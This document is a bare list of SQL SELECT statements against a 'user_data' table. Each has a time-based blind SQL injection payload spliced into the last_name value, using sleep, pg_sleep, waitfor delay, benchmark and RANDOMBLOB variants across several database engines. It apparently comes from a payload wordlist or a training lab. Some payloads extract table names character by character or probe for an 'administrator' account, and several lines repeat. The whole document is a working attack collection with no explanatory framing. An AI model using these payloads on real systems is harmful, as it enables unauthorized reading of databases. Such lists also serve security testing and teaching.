SELECT * FROM user_data WHERE last_name = '15'XOR(if(now()=sysdate(),sleep(5*5),0))OR' ;
SELECT * FROM user_data WHERE last_name = 'and if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='a', sleep(10), null)-- ;
SELECT * FROM user_data WHERE last_name = 'and if((select substr(table_name,2,1) from information_schema.tables where table_schema=database() limit 0,1)='a', sleep(10), null)-- ;
SELECT * FROM user_data WHERE last_name = 'and if((select substr(table_name,3,1) from information_schema.tables where table_schema=database() limit 0,1)='a', sleep(10), null)-- ;
SELECT * FROM user_data WHERE last_name = 'and if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 1,1)='a', sleep(10), null)-- ;
SELECT * FROM user_data WHERE last_name = 'and if((select substr(table_name,2,1) from information_schema.tables where table_schema=database() limit 1,1)='a', sleep(10), null)-- ;
SELECT * FROM user_data WHERE last_name = '1' SELECT CASE WHEN (username='administrator') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--+ ;
SELECT * FROM user_data WHERE last_name = '15'XOR(if(now()=sysdate(),sleep(5*5),0))OR' ;
SELECT * FROM user_data WHERE last_name = 'and if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='a', sleep(10), null)-- ;
SELECT * FROM user_data WHERE last_name = 'and if((select substr(table_name,2,1) from information_schema.tables where table_schema=database() limit 0,1)='a', sleep(10), null)-- ;
SELECT * FROM user_data WHERE last_name = 'and if((select substr(table_name,3,1) from information_schema.tables where table_schema=database() limit 0,1)='a', sleep(10), null)-- ;
SELECT * FROM user_data WHERE last_name = 'and if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 1,1)='a', sleep(10), null)-- ;
SELECT * FROM user_data WHERE last_name = 'and if((select substr(table_name,2,1) from information_schema.tables where table_schema=database() limit 1,1)='a', sleep(10), null)-- ;
SELECT * FROM user_data WHERE last_name = '1' SELECT CASE WHEN (username='administrator') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users--+ ;
SELECT * FROM user_data WHERE last_name = 'sleep(5)# ;
SELECT * FROM user_data WHERE last_name = '1 or sleep(5)# ;
SELECT * FROM user_data WHERE last_name = '" or sleep(5)# ;
SELECT * FROM user_data WHERE last_name = '' or sleep(5)# ;
SELECT * FROM user_data WHERE last_name = '" or sleep(5)=" ;
SELECT * FROM user_data WHERE last_name = '' or sleep(5)=' ;
SELECT * FROM user_data WHERE last_name = '1) or sleep(5)# ;
SELECT * FROM user_data WHERE last_name = '") or sleep(5)=" ;
SELECT * FROM user_data WHERE last_name = '') or sleep(5)=' ;
SELECT * FROM user_data WHERE last_name = '1)) or sleep(5)# ;
SELECT * FROM user_data WHERE last_name = '")) or sleep(5)=" ;
SELECT * FROM user_data WHERE last_name = '')) or sleep(5)=' ;
SELECT * FROM user_data WHERE last_name = ';waitfor delay '0:0:5'-- ;
SELECT * FROM user_data WHERE last_name = ');waitfor delay '0:0:5'-- ;
SELECT * FROM user_data WHERE last_name = '';waitfor delay '0:0:5'-- ;
SELECT * FROM user_data WHERE last_name = '";waitfor delay '0:0:5'-- ;
SELECT * FROM user_data WHERE last_name = '');waitfor delay '0:0:5'-- ;
SELECT * FROM user_data WHERE last_name = '");waitfor delay '0:0:5'-- ;
SELECT * FROM user_data WHERE last_name = '));waitfor delay '0:0:5'-- ;
SELECT * FROM user_data WHERE last_name = ''));waitfor delay '0:0:5'-- ;
SELECT * FROM user_data WHERE last_name = '"));waitfor delay '0:0:5'-- ;
SELECT * FROM user_data WHERE last_name = 'benchmark(10000000,MD5(1))# ;
SELECT * FROM user_data WHERE last_name = '1 or benchmark(10000000,MD5(1))# ;
SELECT * FROM user_data WHERE last_name = '" or benchmark(10000000,MD5(1))# ;
SELECT * FROM user_data WHERE last_name = '' or benchmark(10000000,MD5(1))# ;
SELECT * FROM user_data WHERE last_name = '1) or benchmark(10000000,MD5(1))# ;
SELECT * FROM user_data WHERE last_name = '") or benchmark(10000000,MD5(1))# ;
SELECT * FROM user_data WHERE last_name = '') or benchmark(10000000,MD5(1))# ;
SELECT * FROM user_data WHERE last_name = '1)) or benchmark(10000000,MD5(1))# ;
SELECT * FROM user_data WHERE last_name = '")) or benchmark(10000000,MD5(1))# ;
SELECT * FROM user_data WHERE last_name = '')) or benchmark(10000000,MD5(1))# ;
SELECT * FROM user_data WHERE last_name = 'pg_sleep(5)-- ;
SELECT * FROM user_data WHERE last_name = '1 or pg_sleep(5)-- ;
SELECT * FROM user_data WHERE last_name = '" or pg_sleep(5)-- ;
SELECT * FROM user_data WHERE last_name = '' or pg_sleep(5)-- ;
SELECT * FROM user_data WHERE last_name = '1) or pg_sleep(5)-- ;
SELECT * FROM user_data WHERE last_name = '") or pg_sleep(5)-- ;
SELECT * FROM user_data WHERE last_name = '') or pg_sleep(5)-- ;
SELECT * FROM user_data WHERE last_name = '1)) or pg_sleep(5)-- ;
SELECT * FROM user_data WHERE last_name = '")) or pg_sleep(5)-- ;
SELECT * FROM user_data WHERE last_name = '')) or pg_sleep(5)-- ;
SELECT * FROM user_data WHERE last_name = 'AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe ;
SELECT * FROM user_data WHERE last_name = 'AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' ;
SELECT * FROM user_data WHERE last_name = 'AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP) ;
SELECT * FROM user_data WHERE last_name = 'AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- ;
SELECT * FROM user_data WHERE last_name = 'AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)# ;
SELECT * FROM user_data WHERE last_name = 'SLEEP(5)# ;
SELECT * FROM user_data WHERE last_name = 'SLEEP(5)-- ;
SELECT * FROM user_data WHERE last_name = 'SLEEP(5)=" ;
SELECT * FROM user_data WHERE last_name = 'SLEEP(5)=' ;
SELECT * FROM user_data WHERE last_name = 'or SLEEP(5) ;
SELECT * FROM user_data WHERE last_name = 'or SLEEP(5)# ;
SELECT * FROM user_data WHERE last_name = 'or SLEEP(5)-- ;
SELECT * FROM user_data WHERE last_name = 'or SLEEP(5)=" ;
SELECT * FROM user_data WHERE last_name = 'or SLEEP(5)=' ;
SELECT * FROM user_data WHERE last_name = 'waitfor delay '00:00:05' ;
SELECT * FROM user_data WHERE last_name = 'waitfor delay '00:00:05'-- ;
SELECT * FROM user_data WHERE last_name = 'waitfor delay '00:00:05'# ;
SELECT * FROM user_data WHERE last_name = 'benchmark(50000000,MD5(1)) ;
SELECT * FROM user_data WHERE last_name = 'benchmark(50000000,MD5(1))-- ;
SELECT * FROM user_data WHERE last_name = 'benchmark(50000000,MD5(1))# ;
SELECT * FROM user_data WHERE last_name = 'or benchmark(50000000,MD5(1)) ;
SELECT * FROM user_data WHERE last_name = 'or benchmark(50000000,MD5(1))-- ;
SELECT * FROM user_data WHERE last_name = 'or benchmark(50000000,MD5(1))# ;
SELECT * FROM user_data WHERE last_name = 'pg_SLEEP(5) ;
SELECT * FROM user_data WHERE last_name = 'pg_SLEEP(5)-- ;
SELECT * FROM user_data WHERE last_name = 'pg_SLEEP(5)# ;
SELECT * FROM user_data WHERE last_name = 'or pg_SLEEP(5) ;
SELECT * FROM user_data WHERE last_name = 'or pg_SLEEP(5)-- ;
SELECT * FROM user_data WHERE last_name = 'or pg_SLEEP(5)# ;
SELECT * FROM user_data WHERE last_name = ''\" ;
SELECT * FROM user_data WHERE last_name = 'AnD SLEEP(5) ;
SELECT * FROM user_data WHERE last_name = 'AnD SLEEP(5)-- ;
SELECT * FROM user_data WHERE last_name = 'AnD SLEEP(5)# ;
SELECT * FROM user_data WHERE last_name = '&&SLEEP(5) ;
SELECT * FROM user_data WHERE last_name = '&&SLEEP(5)-- ;
SELECT * FROM user_data WHERE last_name = '&&SLEEP(5)# ;
SELECT * FROM user_data WHERE last_name = '' AnD SLEEP(5) ANd '1 ;
SELECT * FROM user_data WHERE last_name = ''&&SLEEP(5)&&'1 ;
SELECT * FROM user_data WHERE last_name = 'ORDER BY SLEEP(5) ;
SELECT * FROM user_data WHERE last_name = 'ORDER BY SLEEP(5)-- ;
SELECT * FROM user_data WHERE last_name = 'ORDER BY SLEEP(5)# ;
SELECT * FROM user_data WHERE last_name = '(SELECT * FROM (SELECT(SLEEP(5)))ecMj) ;
SELECT * FROM user_data WHERE last_name = '(SELECT * FROM (SELECT(SLEEP(5)))ecMj)# ;
SELECT * FROM user_data WHERE last_name = '(SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- ;
SELECT * FROM user_data WHERE last_name = '+benchmark(3200,SHA1(1))+' ;
SELECT * FROM user_data WHERE last_name = '+ SLEEP(10) + ' ;
SELECT * FROM user_data WHERE last_name = 'RANDOMBLOB(500000000/2) ;
SELECT * FROM user_data WHERE last_name = 'AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) ;
SELECT * FROM user_data WHERE last_name = 'OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) ;
SELECT * FROM user_data WHERE last_name = 'RANDOMBLOB(1000000000/2) ;
SELECT * FROM user_data WHERE last_name = 'AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) ;
SELECT * FROM user_data WHERE last_name = 'OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) ;
SELECT * FROM user_data WHERE last_name = 'SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/ ;
SELECT * FROM user_data WHERE last_name = ' ;
